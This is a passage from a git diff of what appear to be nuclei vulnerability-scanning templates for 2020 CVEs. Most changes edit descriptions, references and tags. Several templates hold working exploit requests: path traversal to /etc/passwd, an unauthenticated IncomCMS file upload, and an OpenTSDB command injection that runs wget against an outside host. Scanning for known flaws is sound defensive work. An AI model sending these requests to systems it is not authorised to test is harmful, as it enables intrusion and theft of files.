-  description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter,
-    to cause local file inclusion resulting in code execution.
+  description: Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, leading to code execution.
   reference:
     - https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5
     - https://nvd.nist.gov/vuln/detail/CVE-2020-29227
+    - https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -19,12 +19,16 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/index.php?page=/etc/passwd%00"
+
     matchers-condition: and
     matchers:
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
-        part: body
+
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/16
diff --git a/cves/2020/CVE-2020-29395.yaml b/cves/2020/CVE-2020-29395.yaml
index c7da937903..72ee292a48 100644
--- a/cves/2020/CVE-2020-29395.yaml
+++ b/cves/2020/CVE-2020-29395.yaml
@@ -1,12 +1,13 @@
 id: CVE-2020-29395
 
 info:
-  name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS)
+  name: Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The EventON plugin through 3.0.5 for WordPress allows addons/?q= XSS via the search field.
+  description: Wordpress EventON Calendar 3.0.5 is vulnerable to cross-site scripting because it allows addons/?q= XSS via the search field.
   reference:
     - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
+    - https://www.myeventon.com/news/
     - https://nvd.nist.gov/vuln/detail/CVE-2020-29395
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -35,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/14
diff --git a/cves/2020/CVE-2020-29453.yaml b/cves/2020/CVE-2020-29453.yaml
index 67ed1506e4..9e3aff7162 100644
--- a/cves/2020/CVE-2020-29453.yaml
+++ b/cves/2020/CVE-2020-29453.yaml
@@ -13,6 +13,8 @@ info:
     cvss-score: 5.3
     cve-id: CVE-2020-29453
     cwe-id: CWE-22
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
   tags: cve,cve2020,atlassian,jira,lfi
 
 requests:
diff --git a/cves/2020/CVE-2020-29597.yaml b/cves/2020/CVE-2020-29597.yaml
new file mode 100644
index 0000000000..250129bae7
--- /dev/null
+++ b/cves/2020/CVE-2020-29597.yaml
@@ -0,0 +1,54 @@
+id: CVE-2020-29597
+
+info:
+  name: IncomCMS 2.0 - Arbitrary File Upload
+  author: princechaddha
+  severity: critical
+  description: |
+    IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server.
+  reference:
+    - https://github.com/Trhackno/CVE-2020-29597
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-29597
+    - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md
+    - https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-29597
+    cwe-id: CWE-434
+  metadata:
+    verified: "true"
+  tags: cve,cve2020,incomcms,fileupload,intrusive
+
+requests:
+  - raw:
+      - |
+        POST /incom/modules/uploader/showcase/script.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt
+
+        ------WebKitFormBoundaryBEJZt0IK73M2mAbt
+        Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.png"
+        Content-Type: text/html
+
+        {{randstr_2}}
+        ------WebKitFormBoundaryBEJZt0IK73M2mAbt--
+
+      - |
+        GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_1
+        words:
+          - '{"status":"1","name":"{{randstr_1}}.png"}'
+
+      - type: word
+        part: body_2
+        words:
+          - '{{randstr_2}}'
+
+# Enhanced by CS 06/06/2022
diff --git a/cves/2020/CVE-2020-3187.yaml b/cves/2020/CVE-2020-3187.yaml
index 4555fd6300..ba9ff66e47 100644
--- a/cves/2020/CVE-2020-3187.yaml
+++ b/cves/2020/CVE-2020-3187.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 9.1
     cve-id: CVE-2020-3187
     cwe-id: CWE-22
-  tags: cve,cve2020,cisco
+  tags: cve,cve2020,cisco,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-3452.yaml b/cves/2020/CVE-2020-3452.yaml
index 657ec3c39e..3f087aa866 100644
--- a/cves/2020/CVE-2020-3452.yaml
+++ b/cves/2020/CVE-2020-3452.yaml
@@ -1,11 +1,11 @@
 id: CVE-2020-3452
 
 info:
-  name: Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) - Arbitrary File Retrieval
+  name: Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion
   author: pdteam
   severity: high
   description: |
-    A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.
+    Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software is vulnerable to local file inclusion due to directory traversal attacks that can read sensitive files on a targeted system because of a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.
   reference:
     - https://twitter.com/aboul3la/status/1286012324722155525
     - http://packetstormsecurity.com/files/158646/Cisco-ASA-FTD-Remote-File-Disclosure.html
@@ -13,12 +13,13 @@ info:
     - http://packetstormsecurity.com/files/159523/Cisco-ASA-FTD-9.6.4.42-Path-Traversal.html
     - http://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html
     - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-3452
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2020-3452
     cwe-id: CWE-20
-  tags: cve,cve2020,cisco,lfi
+  tags: lfi,kev,packetstorm,cve,cve2020,cisco
 
 requests:
   - method: GET
@@ -31,3 +32,5 @@ requests:
           - "INTERNAL_PASSWORD_ENABLED"
           - "CONF_VIRTUAL_KEYBOARD"
         condition: and
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2020/CVE-2020-35234.yaml b/cves/2020/CVE-2020-35234.yaml
index 57903d44fe..62acb0ba37 100644
--- a/cves/2020/CVE-2020-35234.yaml
+++ b/cves/2020/CVE-2020-35234.yaml
@@ -8,9 +8,13 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2020-35234
     - https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
-  classification:
-    cve-id: CVE-2020-35234
+    - https://wordpress.org/plugins/easy-wp-smtp/#developers
   remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2020-35234
+    cwe-id: CWE-532
   tags: cve,cve2020,wordpress,wp-plugin,smtp
 
 requests:
diff --git a/cves/2020/CVE-2020-35338.yaml b/cves/2020/CVE-2020-35338.yaml
index 06a1b58605..5da111aa7e 100644
--- a/cves/2020/CVE-2020-35338.yaml
+++ b/cves/2020/CVE-2020-35338.yaml
@@ -1,20 +1,20 @@
 id: CVE-2020-35338
 
 info:
+  name: Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection
   author: Jeya Seelan
   severity: critical
-  name: Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection
   description: Wireless Multiplex Terminal Playout Server <=20.2.8 has a default account with a password of pokon available via its web administrative interface.
   reference:
     - https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa
     - https://nvd.nist.gov/vuln/detail/CVE-2020-35338
-  tags: cve,cve2020,wmt,default-login
-
+    - https://www.mobileviewpoint.com/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.80
+    cvss-score: 9.8
     cve-id: CVE-2020-35338
     cwe-id: CWE-798
+  tags: cve,cve2020,wmt,default-login
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-35476.yaml b/cves/2020/CVE-2020-35476.yaml
index 89376f3904..88c9505ec1 100644
--- a/cves/2020/CVE-2020-35476.yaml
+++ b/cves/2020/CVE-2020-35476.yaml
@@ -18,7 +18,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
+      - "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://interact.sh%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
     matchers-condition: and
     matchers:
       - type: status
diff --git a/cves/2020/CVE-2020-35489.yaml b/cves/2020/CVE-2020-35489.yaml
index 0626a6e2d7..51774f7203 100644
--- a/cves/2020/CVE-2020-35489.yaml
+++ b/cves/2020/CVE-2020-35489.yaml
@@ -7,12 +7,15 @@ info:
   description: WordPress Contact Form 7 before 5.3.2 allows unrestricted file upload and remote code execution because a filename may contain special characters.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2020-35489
+    - https://www.getastra.com/blog/911/plugin-exploit/contact-form-7-unrestricted-file-upload/
+    - https://wordpress.org/plugins/contact-form-7/#developers
+    - https://www.jinsonvarghese.com/unrestricted-file-upload-in-contact-form-7/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-score: 10
     cve-id: CVE-2020-35489
     cwe-id: CWE-434
-  tags: cve,cve2020,wordpress,wp-plugin,rce,upload
+  tags: cve,cve2020,wordpress,wp-plugin,rce,upload,intrusive
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-35580.yaml b/cves/2020/CVE-2020-35580.yaml
index 59b025bb19..5aa3e621d1 100644
--- a/cves/2020/CVE-2020-35580.yaml
+++ b/cves/2020/CVE-2020-35580.yaml
@@ -1,14 +1,14 @@
 id: CVE-2020-35580
 
 info:
-  name: SearchBlox < 9.2.2 - Local File Inclusion (LFI)
+  name: SearchBlox <9.2.2 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Local File Inclusion vulnerability in the FileServlet in all SearchBlox before 9.2.2 allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url=
-    request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1
-    password hashes of other SearchBlox users.
+  description: SearchBlox prior to version 9.2.2 is susceptible to local file inclusion in  FileServlet that allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users.
   reference:
     - https://hateshape.github.io/general/2021/05/11/CVE-2020-35580.html
+    - https://developer.searchblox.com/docs/getting-started-with-searchblox
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-35580
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -23,6 +23,8 @@ requests:
 
     matchers:
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
-        part: body
+
+# Enhanced by mp on 2022/06/28
diff --git a/cves/2020/CVE-2020-35598.yaml b/cves/2020/CVE-2020-35598.yaml
index aca90ef762..0a60638f12 100644
--- a/cves/2020/CVE-2020-35598.yaml
+++ b/cves/2020/CVE-2020-35598.yaml
@@ -1,19 +1,20 @@
 id: CVE-2020-35598
 
 info:
-  name: Advanced Comment System 1.0 - Path Traversal
+  name: Advanced Comment System 1.0 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI.
+  description: ACS Advanced Comment System 1.0 is affected by local file inclusion via an advanced_component_system/index.php?ACS_path=..%2f URI.
   reference:
     - https://www.exploit-db.com/exploits/49343
-    - https://www.cvedetails.com/cve/CVE-2020-35598
+    - https://seclists.org/fulldisclosure/2020/Dec/13
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-35598
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2020-35598
     cwe-id: CWE-22
-  tags: cve,cve2020,lfi
+  tags: acs,edb,seclists,cve,cve2020,lfi
 
 requests:
   - method: GET
@@ -30,3 +31,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/28
diff --git a/cves/2020/CVE-2020-35713.yaml b/cves/2020/CVE-2020-35713.yaml
index 6d26147c9a..42dbf98178 100644
--- a/cves/2020/CVE-2020-35713.yaml
+++ b/cves/2020/CVE-2020-35713.yaml
@@ -4,7 +4,7 @@ info:
   name: Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution
   author: gy741
   severity: critical
-  description: "Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page."
+  description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.
   reference:
     - https://downloads.linksys.com/support/assets/releasenotes/ExternalReleaseNotes_RE6500_1.0.012.001.txt
     - https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html
diff --git a/cves/2020/CVE-2020-35729.yaml b/cves/2020/CVE-2020-35729.yaml
index 20480a2270..4a04f7f24c 100644
--- a/cves/2020/CVE-2020-35729.yaml
+++ b/cves/2020/CVE-2020-35729.yaml
@@ -4,10 +4,12 @@ info:
   name: Klog Server <=2.41- Unauthenticated Command Injection
   author: dwisiswant0
   severity: critical
-  description: "Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7."
+  description: Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7.
   reference:
     - https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection
     - https://nvd.nist.gov/vuln/detail/CVE-2020-35729
+    - https://github.com/mustgundogdu/Research/blob/main/KLOG_SERVER/Exploit_Code
+    - https://github.com/mustgundogdu/Research/blob/main/KLOG_SERVER/README.md
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2020/CVE-2020-35736.yaml b/cves/2020/CVE-2020-35736.yaml
index a8705ecb15..6dde88ab8a 100644
--- a/cves/2020/CVE-2020-35736.yaml
+++ b/cves/2020/CVE-2020-35736.yaml
@@ -1,13 +1,14 @@
 id: CVE-2020-35736
 
 info:
-  name: GateOne 1.1 - Arbitrary File Retrieval
+  name: GateOne 1.1 - Local File Inclusion
   author: pikpikcu
   severity: high
-  description: GateOne 1.1 allows arbitrary file retrieval without authentication via /downloads/.. directory traversal because os.path.join is incorrectly used.
+  description: GateOne 1.1 allows arbitrary file retrieval without authentication via /downloads/.. local file inclusion because os.path.join is incorrectly used.
   reference:
     - https://github.com/liftoff/GateOne/issues/747
     - https://nvd.nist.gov/vuln/detail/CVE-2020-35736
+    - https://rmb122.com/2019/08/28/Ogeek-Easy-Realworld-Challenge-1-2-Writeup/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -29,3 +30,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/28
diff --git a/cves/2020/CVE-2020-35749.yaml b/cves/2020/CVE-2020-35749.yaml
index e8e74fcf2b..084f2782b4 100644
--- a/cves/2020/CVE-2020-35749.yaml
+++ b/cves/2020/CVE-2020-35749.yaml
@@ -1,20 +1,21 @@
 id: CVE-2020-35749
 
 info:
-  name: Simple Job Board < 2.9.4 -Arbitrary File Retrieval (Authenticated)
+  name: WordPress Simple Job Board <2.9.4 - Local File Inclusion
   author: cckuailong
   severity: high
-  description: The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server
-    via a path traversal attack.
+  description: WordPress Simple Job Board prior to version 2.9.4 is vulnerable to arbitrary file retrieval vulnerabilities because it does not validate the sjb_file parameter when viewing a resume, allowing an authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via local file inclusion.
   reference:
     - https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d
     - https://nvd.nist.gov/vuln/detail/CVE-2020-35749
+    - https://docs.google.com/document/d/1TbePkrRGsczepBaJptIdVRvfRrjiC5hjGg_Vxdesw6E/edit?usp=sharing
+    - http://packetstormsecurity.com/files/161050/Simple-JobBoard-Authenticated-File-Read.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
     cvss-score: 7.7
     cve-id: CVE-2020-35749
     cwe-id: CWE-22
-  tags: cve,cve2020,lfi,wp,wordpress,wp-plugin,authenticated
+  tags: authenticated,packetstorm,wp,cve2020,lfi,wordpress,wp-plugin,wpscan,cve
 
 requests:
   - raw:
@@ -26,9 +27,11 @@ requests:
         Cookie: wordpress_test_cookie=WP%20Cookie%20check
 
         log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
       - |
         GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1
         Host: {{Hostname}}
+
     cookie-reuse: true
     matchers-condition: and
     matchers:
@@ -39,3 +42,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/28
diff --git a/cves/2020/CVE-2020-35774.yaml b/cves/2020/CVE-2020-35774.yaml
index b4a2600971..261b7db48c 100644
--- a/cves/2020/CVE-2020-35774.yaml
+++ b/cves/2020/CVE-2020-35774.yaml
@@ -9,9 +9,11 @@ info:
   reference:
     - https://advisory.checkmarx.net/advisory/CX-2020-4287
     - https://nvd.nist.gov/vuln/detail/CVE-2020-35774
+    - https://github.com/twitter/twitter-server/commit/e0aeb87e89a6e6c711214ee2de0dd9f6e5f9cb6c
+    - https://github.com/twitter/twitter-server/compare/twitter-server-20.10.0...twitter-server-20.12.0
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 6.1
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
     cve-id: CVE-2020-35774
     cwe-id: CWE-79
   tags: cve,cve2020,xss,twitter-server
diff --git a/cves/2020/CVE-2020-3580.yaml b/cves/2020/CVE-2020-3580.yaml
index 19420f367e..7e213a029c 100644
--- a/cves/2020/CVE-2020-3580.yaml
+++ b/cves/2020/CVE-2020-3580.yaml
@@ -1,20 +1,21 @@
 id: CVE-2020-3580
 
 info:
-  name: Cisco ASA XSS
+  name: Cisco ASA/FTD Software - Cross-Site Scripting
   author: pikpikcu
   severity: medium
   description: |
-    Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.
+    Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software are vulnerable to cross-site scripting and could allow an unauthenticated, remote attacker to conduct attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the reference links.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-3580
     - https://twitter.com/ptswarm/status/1408050644460650502
+    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-3580
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2020-3580
     cwe-id: CWE-79
-  tags: cve,cve2020,xss,cisco
+  tags: cve,cve2020,xss,cisco,kev
 
 requests:
   - raw:
@@ -39,4 +40,6 @@ requests:
       - type: word
         part: header
         words:
-          - "text/html"
\ No newline at end of file
+          - "text/html"
+
+# Enhanced by mp on 2022/08/14
diff --git a/cves/2020/CVE-2020-35846.yaml b/cves/2020/CVE-2020-35846.yaml
index b4068fb558..19d512d912 100644
--- a/cves/2020/CVE-2020-35846.yaml
+++ b/cves/2020/CVE-2020-35846.yaml
@@ -4,10 +4,12 @@ info:
   name: Agentejo Cockpit < 0.11.2 NoSQL Injection
   author: dwisiswant0
   severity: critical
-  description: "Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value."
+  description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value.
   reference:
     - https://swarm.ptsecurity.com/rce-cockpit-cms/
     - https://nvd.nist.gov/vuln/detail/CVE-2020-35846
+    - https://getcockpit.com/
+    - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2020/CVE-2020-35847.yaml b/cves/2020/CVE-2020-35847.yaml
index c1b84cf4f7..4088e8d03a 100644
--- a/cves/2020/CVE-2020-35847.yaml
+++ b/cves/2020/CVE-2020-35847.yaml
@@ -4,10 +4,12 @@ info:
   name: Agentejo Cockpit <0.11.2 NoSQL Injection
   author: dwisiswant0
   severity: critical
-  description: "Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller."
+  description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.
   reference:
     - https://swarm.ptsecurity.com/rce-cockpit-cms/
     - https://nvd.nist.gov/vuln/detail/CVE-2020-35847
+    - https://getcockpit.com/
+    - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2020/CVE-2020-35848.yaml b/cves/2020/CVE-2020-35848.yaml
index 969b16d89c..703b0efb37 100644
--- a/cves/2020/CVE-2020-35848.yaml
+++ b/cves/2020/CVE-2020-35848.yaml
@@ -4,11 +4,12 @@ info:
   name: Agentejo Cockpit <0.12.0 - NoSQL Injection
   author: dwisiswant0
   severity: critical
-  description: "Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the
-    newpassword method of the Auth controller, which is responsible for displaying the user password reset form."
+  description: Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form.
   reference:
     - https://swarm.ptsecurity.com/rce-cockpit-cms/
     - https://nvd.nist.gov/vuln/detail/CVE-2020-35848
+    - https://getcockpit.com/
+    - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2020/CVE-2020-35951.yaml b/cves/2020/CVE-2020-35951.yaml
index 0653958b0d..4cc26a7d66 100644
--- a/cves/2020/CVE-2020-35951.yaml
+++ b/cves/2020/CVE-2020-35951.yaml
@@ -4,16 +4,17 @@ info:
   name: Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion
   author: princechaddha
   severity: critical
-  description: "Wordpress Quiz and Survey Master <7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files)."
+  description: Wordpress Quiz and Survey Master <7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files).
   reference:
     - https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/
     - https://nvd.nist.gov/vuln/detail/CVE-2020-35951
+    - https://wpscan.com/vulnerability/10348
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H
     cvss-score: 9.9
     cve-id: CVE-2020-35951
     cwe-id: CWE-306
-  tags: cve,cve2020,wordpress,wp-plugin
+  tags: cve2020,wordpress,wp-plugin,wpscan,cve
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-36112.yaml b/cves/2020/CVE-2020-36112.yaml
index a74b3f8fa0..9992ca8313 100644
--- a/cves/2020/CVE-2020-36112.yaml
+++ b/cves/2020/CVE-2020-36112.yaml
@@ -14,7 +14,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2020-36112
     cwe-id: CWE-89
-  tags: cve,cve2020,sqli,cse
+  tags: cve,cve2020,sqli,cse,edb,tenable
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-36289.yaml b/cves/2020/CVE-2020-36289.yaml
index 12099e7be6..18d7066106 100644
--- a/cves/2020/CVE-2020-36289.yaml
+++ b/cves/2020/CVE-2020-36289.yaml
@@ -4,16 +4,18 @@ info:
   name: Atlassian Jira Unauth User Enumeration
   author: dhiyaneshDk
   severity: medium
-  description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa
-    endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.
+  description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.
   reference:
     - https://twitter.com/ptswarm/status/1402644004781633540
     - https://nvd.nist.gov/vuln/detail/CVE-2020-36289
+    - https://jira.atlassian.com/browse/JRASERVER-71559
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2020-36289
